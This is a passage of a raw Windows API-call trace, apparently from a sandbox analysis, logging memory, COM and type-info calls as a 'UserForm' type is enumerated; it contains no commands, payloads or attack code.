[0041.949] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cab330, dwSize=0x8) returned 1 [0041.949] IMalloc:Alloc (This=0x7feffc15380, cb=0x10) returned 0x6c34690 [0041.949] IMalloc:Free (This=0x7feffc15380, pv=0x6c34690) [0041.950] GetCurrentProcess () returned 0xffffffffffffffff [0041.950] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cab368, dwSize=0x8) returned 1 [0041.950] IMalloc:Alloc (This=0x7feffc15380, cb=0x12) returned 0x6c34690 [0041.950] IMalloc:Free (This=0x7feffc15380, pv=0x6c34690) [0041.950] GetCurrentProcess () returned 0xffffffffffffffff [0041.950] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cab4a8, dwSize=0x8) returned 1 [0041.950] IMalloc:Alloc (This=0x7feffc15380, cb=0x11) returned 0x6c34690 [0041.950] IMalloc:Free (This=0x7feffc15380, pv=0x6c34690) [0041.950] GetCurrentProcess () returned 0xffffffffffffffff [0041.950] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cab578, dwSize=0x8) returned 1 [0041.950] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6a7bf68, dwSize=0x8) returned 1 [0041.950] GetCurrentProcess () returned 0xffffffffffffffff [0041.950] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6a7c038, dwSize=0x8) returned 1 [0041.950] GetCurrentProcess () returned 0xffffffffffffffff [0041.950] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cab018, dwSize=0x8) returned 1 [0041.950] GetCurrentProcess () returned 0xffffffffffffffff [0041.950] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cab0e0, dwSize=0x8) returned 1 [0041.950] GetCurrentProcess () returned 0xffffffffffffffff [0041.950] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cab270, dwSize=0x8) returned 1 [0041.950] GetCurrentProcess () returned 0xffffffffffffffff [0041.950] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cab330, dwSize=0x8) returned 1 [0041.950] GetCurrentProcess () returned 0xffffffffffffffff [0041.950] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cab368, dwSize=0x8) returned 1 [0041.950] GetCurrentProcess () returned 0xffffffffffffffff [0041.950] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cab4a8, dwSize=0x8) returned 1 [0041.950] GetCurrentProcess () returned 0xffffffffffffffff [0041.950] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cab578, dwSize=0x8) returned 1 [0041.950] IMalloc:Realloc (This=0x7feffc15380, pv=0x0, cb=0x30) returned 0x68805f0 [0041.950] VirtualAlloc (lpAddress=0x0, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x5e60000 [0041.951] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x66ea710, cbMultiByte=4, lpWideCharStr=0x5e6018c, cchWideChar=10 | out: lpWideCharStr="Open") returned 4 [0041.951] IMalloc:Realloc (This=0x7feffc15380, pv=0x0, cb=0x200) returned 0x6cb8e80 [0041.952] IMalloc:Realloc (This=0x7feffc15380, pv=0x6b9cf10, cb=0x100) returned 0x6d26c10 [0041.952] IUnknown:Release (This=0x6a6e9a8) returned 0x2 [0041.952] IMalloc:Alloc (This=0x7feffc15380, cb=0x0) returned 0x6c13fb0 [0041.952] IUnknown:QueryInterface (in: This=0x6a6e9a8, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x184850 | out: ppvObject=0x184850*=0x0) returned 0x80004002 [0041.952] IUnknown:QueryInterface (in: This=0x6a6e9a8, riid=0x7fee45d40f0*(Data1=0x20412, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x184798 | out: ppvObject=0x184798*=0x6a6e9a8) returned 0x0 [0041.952] ITypeInfo2:GetCustData (in: This=0x6a6e9a8, GUID=0x7fee45dd970*(Data1=0xba65d790, Data2=0x9301, Data3=0x11cf, Data4=([0]=0x8d, [1]=0x22, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x37, [6]=0x53, [7]=0x84)), pVarVal=0x1847a8 | out: pVarVal=0x1847a8*(varType=0x0, wReserved1=0x18, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x800000000)) returned 0x0 [0041.952] IUnknown:Release (This=0x6a6e9a8) returned 0x3 [0041.952] ITypeInfo:RemoteGetDocumentation (in: This=0x6a6e9a8, memid=-1, refPtrFlags=0x1847a0, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x1847c0 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x1847c0*="") returned 0x0 [0041.952] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="UserForm", cchWideChar=9, lpMultiByteStr=0x1846b0, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="UserForm", lpUsedDefaultChar=0x0) returned 9 [0041.952] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="UserForm") returned 0x10044e [0041.952] ITypeInfo:RemoteGetTypeAttr (in: This=0x6a6e948, ppTypeAttr=0x1847a0, pDummy=0x0 | out: ppTypeAttr=0x1847a0, pDummy=0x0) returned 0x0 [0041.952] ITypeInfo:LocalReleaseTypeAttr (This=0x6a6e948) returned 0x0 [0041.952] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x0, ppFuncDesc=0x184778, pDummy=0x70 | out: ppFuncDesc=0x184778, pDummy=0x70) returned 0x0 [0041.952] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.952] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x1, ppFuncDesc=0x184778, pDummy=0x70 | out: ppFuncDesc=0x184778, pDummy=0x70) returned 0x0 [0041.952] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.952] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x2, ppFuncDesc=0x184778, pDummy=0x70 | out: ppFuncDesc=0x184778, pDummy=0x70) returned 0x0 [0041.952] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.952] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x3, ppFuncDesc=0x184778, pDummy=0x70 | out: ppFuncDesc=0x184778, pDummy=0x70) returned 0x0 [0041.953] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.953] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x4, ppFuncDesc=0x184778, pDummy=0x70 | out: ppFuncDesc=0x184778, pDummy=0x70) returned 0x0 [0041.953] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.953] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x5, ppFuncDesc=0x184778, pDummy=0x70 | out: ppFuncDesc=0x184778, pDummy=0x70) returned 0x0 [0041.953] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.953] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x6, ppFuncDesc=0x184778, pDummy=0x140 | out: ppFuncDesc=0x184778, pDummy=0x140) returned 0x0 [0041.953] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.953] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x7, ppFuncDesc=0x184778, pDummy=0x140 | out: ppFuncDesc=0x184778, pDummy=0x140) returned 0x0 [0041.953] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.953] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x8, ppFuncDesc=0x184778, pDummy=0x70 | out: ppFuncDesc=0x184778, pDummy=0x70) returned 0x0 [0041.953] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.953] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x9, ppFuncDesc=0x184778, pDummy=0x70 | out: ppFuncDesc=0x184778, pDummy=0x70) returned 0x0 [0041.953] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.953] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0xa, ppFuncDesc=0x184778, pDummy=0x70 | out: ppFuncDesc=0x184778, pDummy=0x70) returned 0x0 [0041.953] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.953] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0xb, ppFuncDesc=0x184778, pDummy=0x70 | out: ppFuncDesc=0x184778, pDummy=0x70) returned 0x0 [0041.953] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.953] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0xc, ppFuncDesc=0x184778, pDummy=0x70 | out: ppFuncDesc=0x184778, pDummy=0x70) returned 0x0 [0041.953] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.953] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0xd, ppFuncDesc=0x184778, pDummy=0x70 | out: ppFuncDesc=0x184778, pDummy=0x70) returned 0x0 [0041.953] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.953] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0xe, ppFuncDesc=0x184778, pDummy=0x70 | out: ppFuncDesc=0x184778, pDummy=0x70) returned 0x0 [0041.953] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.953] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0xf, ppFuncDesc=0x184778, pDummy=0x70 | out: ppFuncDesc=0x184778, pDummy=0x70) returned 0x0 [0041.953] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.953] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x10, ppFuncDesc=0x184778, pDummy=0x70 | out: ppFuncDesc=0x184778, pDummy=0x70) returned 0x0 [0041.953] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.953] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x11, ppFuncDesc=0x184778, pDummy=0x70 | out: ppFuncDesc=0x184778, pDummy=0x70) returned 0x0 [0041.953] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.953] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x12, ppFuncDesc=0x184778, pDummy=0x70 | out: ppFuncDesc=0x184778, pDummy=0x70) returned 0x0 [0041.953] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.953] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x13, ppFuncDesc=0x184778, pDummy=0x70 | out: ppFuncDesc=0x184778, pDummy=0x70) returned 0x0 [0041.953] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.953] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x14, ppFuncDesc=0x184778, pDummy=0x70 | out: ppFuncDesc=0x184778, pDummy=0x70) returned 0x0 [0041.953] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.953] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x15, ppFuncDesc=0x184778, pDummy=0x70 | out: ppFuncDesc=0x184778, pDummy=0x70) returned 0x0 [0041.953] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.953] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x16, ppFuncDesc=0x184778, pDummy=0x70 | out: ppFuncDesc=0x184778, pDummy=0x70) returned 0x0 [0041.953] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.953] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x17, ppFuncDesc=0x184778, pDummy=0x70 | out: ppFuncDesc=0x184778, pDummy=0x70) returned 0x0 [0041.953] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.953] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x18, ppFuncDesc=0x184778, pDummy=0x70 | out: ppFuncDesc=0x184778, pDummy=0x70) returned 0x0 [0041.953] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.953] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x19, ppFuncDesc=0x184778, pDummy=0x70 | out: ppFuncDesc=0x184778, pDummy=0x70) returned 0x0 [0041.953] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.953] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x1a, ppFuncDesc=0x184778, pDummy=0x70 | out: ppFuncDesc=0x184778, pDummy=0x70) returned 0x0 [0041.953] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.953] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x1b, ppFuncDesc=0x184778, pDummy=0x70 | out: ppFuncDesc=0x184778, pDummy=0x70) returned 0x0 [0041.953] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.954] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x1c, ppFuncDesc=0x184778, pDummy=0x70 | out: ppFuncDesc=0x184778, pDummy=0x70) returned 0x0 [0041.954] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.954] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x1d, ppFuncDesc=0x184778, pDummy=0x70 | out: ppFuncDesc=0x184778, pDummy=0x70) returned 0x0 [0041.954] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.954] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x1e, ppFuncDesc=0x184778, pDummy=0x70 | out: ppFuncDesc=0x184778, pDummy=0x70) returned 0x0 [0041.954] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.954] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x1f, ppFuncDesc=0x184778, pDummy=0x70 | out: ppFuncDesc=0x184778, pDummy=0x70) returned 0x0 [0041.954] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.954] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x20, ppFuncDesc=0x184778, pDummy=0x70 | out: ppFuncDesc=0x184778, pDummy=0x70) returned 0x0 [0041.954] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.954] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x21, ppFuncDesc=0x184778, pDummy=0x70 | out: ppFuncDesc=0x184778, pDummy=0x70) returned 0x0 [0041.954] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.954] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x22, ppFuncDesc=0x184778, pDummy=0x70 | out: ppFuncDesc=0x184778, pDummy=0x70) returned 0x0 [0041.954] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.954] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x23, ppFuncDesc=0x184778, pDummy=0x70 | out: ppFuncDesc=0x184778, pDummy=0x70) returned 0x0 [0041.954] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.954] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x24, ppFuncDesc=0x184778, pDummy=0x70 | out: ppFuncDesc=0x184778, pDummy=0x70) returned 0x0 [0041.954] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.954] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x25, ppFuncDesc=0x184778, pDummy=0x70 | out: ppFuncDesc=0x184778, pDummy=0x70) returned 0x0 [0041.954] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.954] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x26, ppFuncDesc=0x184778, pDummy=0x70 | out: ppFuncDesc=0x184778, pDummy=0x70) returned 0x0 [0041.954] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.954] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x27, ppFuncDesc=0x184778, pDummy=0x70 | out: ppFuncDesc=0x184778, pDummy=0x70) returned 0x0 [0041.954] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.954] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x28, ppFuncDesc=0x184778, pDummy=0x70 | out: ppFuncDesc=0x184778, pDummy=0x70) returned 0x0 [0041.954] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.954] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x29, ppFuncDesc=0x184778, pDummy=0x70 | out: ppFuncDesc=0x184778, pDummy=0x70) returned 0x0 [0041.954] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.954] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x2a, ppFuncDesc=0x184778, pDummy=0x70 | out: ppFuncDesc=0x184778, pDummy=0x70) returned 0x0 [0041.954] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.954] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x2b, ppFuncDesc=0x184778, pDummy=0x70 | out: ppFuncDesc=0x184778, pDummy=0x70) returned 0x0 [0041.954] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.954] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x2c, ppFuncDesc=0x184778, pDummy=0x70 | out: ppFuncDesc=0x184778, pDummy=0x70) returned 0x0 [0041.954] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.954] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x2d, ppFuncDesc=0x184778, pDummy=0x70 | out: ppFuncDesc=0x184778, pDummy=0x70) returned 0x0 [0041.954] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.954] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x2e, ppFuncDesc=0x184778, pDummy=0x70 | out: ppFuncDesc=0x184778, pDummy=0x70) returned 0x0 [0041.954] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.954] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x2f, ppFuncDesc=0x184778, pDummy=0x70 | out: ppFuncDesc=0x184778, pDummy=0x70) returned 0x0 [0041.954] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.954] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x30, ppFuncDesc=0x184778, pDummy=0x70 | out: ppFuncDesc=0x184778, pDummy=0x70) returned 0x0 [0041.954] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.954] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x31, ppFuncDesc=0x184778, pDummy=0x70 | out: ppFuncDesc=0x184778, pDummy=0x70) returned 0x0 [0041.954] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.954] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x32, ppFuncDesc=0x184778, pDummy=0x70 | out: ppFuncDesc=0x184778, pDummy=0x70) returned 0x0 [0041.954] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.954] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x33, ppFuncDesc=0x184778, pDummy=0x70 | out: ppFuncDesc=0x184778, pDummy=0x70) returned 0x0 [0041.954] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.954] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x34, ppFuncDesc=0x184778, pDummy=0x70 | out: ppFuncDesc=0x184778, pDummy=0x70) returned 0x0 [0041.955] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.955] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x35, ppFuncDesc=0x184778, pDummy=0x70 | out: ppFuncDesc=0x184778, pDummy=0x70) returned 0x0 [0041.955] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.955] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x36, ppFuncDesc=0x184778, pDummy=0x70 | out: ppFuncDesc=0x184778, pDummy=0x70) returned 0x0 [0041.955] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.955] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x37, ppFuncDesc=0x184778, pDummy=0x70 | out: ppFuncDesc=0x184778, pDummy=0x70) returned 0x0 [0041.955] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.955] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x38, ppFuncDesc=0x184778, pDummy=0x70 | out: ppFuncDesc=0x184778, pDummy=0x70) returned 0x0 [0041.955] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.955] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x39, ppFuncDesc=0x184778, pDummy=0x70 | out: ppFuncDesc=0x184778, pDummy=0x70) returned 0x0 [0041.955] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.955] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x3a, ppFuncDesc=0x184778, pDummy=0x70 | out: ppFuncDesc=0x184778, pDummy=0x70) returned 0x0 [0041.955] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.955] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x3b, ppFuncDesc=0x184778, pDummy=0x70 | out: ppFuncDesc=0x184778, pDummy=0x70) returned 0x0 [0041.955] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.955] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x3c, ppFuncDesc=0x184778, pDummy=0x70 | out: ppFuncDesc=0x184778, pDummy=0x70) returned 0x0 [0041.955] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.955] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x3d, ppFuncDesc=0x184778, pDummy=0x70 | out: ppFuncDesc=0x184778, pDummy=0x70) returned 0x0 [0041.955] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.955] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x3e, ppFuncDesc=0x184778, pDummy=0x70 | out: ppFuncDesc=0x184778, pDummy=0x70) returned 0x0 [0041.955] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.955] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x3f, ppFuncDesc=0x184778, pDummy=0x70 | out: ppFuncDesc=0x184778, pDummy=0x70) returned 0x0 [0041.955] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.955] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x40, ppFuncDesc=0x184778, pDummy=0x70 | out: ppFuncDesc=0x184778, pDummy=0x70) returned 0x0 [0041.955] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.955] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x41, ppFuncDesc=0x184778, pDummy=0x70 | out: ppFuncDesc=0x184778, pDummy=0x70) returned 0x0 [0041.955] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.955] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x42, ppFuncDesc=0x184778, pDummy=0x70 | out: ppFuncDesc=0x184778, pDummy=0x70) returned 0x0 [0041.955] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.955] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x43, ppFuncDesc=0x184778, pDummy=0x70 | out: ppFuncDesc=0x184778, pDummy=0x70) returned 0x0 [0041.955] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.955] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x44, ppFuncDesc=0x184778, pDummy=0x70 | out: ppFuncDesc=0x184778, pDummy=0x70) returned 0x0 [0041.955] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.955] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x45, ppFuncDesc=0x184778, pDummy=0x70 | out: ppFuncDesc=0x184778, pDummy=0x70) returned 0x0 [0041.955] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.955] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x46, ppFuncDesc=0x184778, pDummy=0x70 | out: ppFuncDesc=0x184778, pDummy=0x70) returned 0x0 [0041.955] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.955] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x47, ppFuncDesc=0x184778, pDummy=0x70 | out: ppFuncDesc=0x184778, pDummy=0x70) returned 0x0 [0041.955] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.955] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x48, ppFuncDesc=0x184778, pDummy=0x70 | out: ppFuncDesc=0x184778, pDummy=0x70) returned 0x0 [0041.955] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.955] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x49, ppFuncDesc=0x184778, pDummy=0x70 | out: ppFuncDesc=0x184778, pDummy=0x70) returned 0x0 [0041.955] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.955] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x4a, ppFuncDesc=0x184778, pDummy=0x70 | out: ppFuncDesc=0x184778, pDummy=0x70) returned 0x0 [0041.955] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.955] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x4b, ppFuncDesc=0x184778, pDummy=0x70 | out: ppFuncDesc=0x184778, pDummy=0x70) returned 0x0 [0041.956] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.956] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x4c, ppFuncDesc=0x184778, pDummy=0x70 | out: ppFuncDesc=0x184778, pDummy=0x70) returned 0x0 [0041.956] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.956] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x4d, ppFuncDesc=0x184778, pDummy=0x70 | out: ppFuncDesc=0x184778, pDummy=0x70) returned 0x0 [0041.956] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.956] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x4e, ppFuncDesc=0x184778, pDummy=0x70 | out: ppFuncDesc=0x184778, pDummy=0x70) returned 0x0 [0041.956] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.956] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x4f, ppFuncDesc=0x184778, pDummy=0x70 | out: ppFuncDesc=0x184778, pDummy=0x70) returned 0x0 [0041.956] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.956] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x50, ppFuncDesc=0x184778, pDummy=0x70 | out: ppFuncDesc=0x184778, pDummy=0x70) returned 0x0 [0041.956] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.956] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x51, ppFuncDesc=0x184778, pDummy=0x70 | out: ppFuncDesc=0x184778, pDummy=0x70) returned 0x0 [0041.956] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.956] 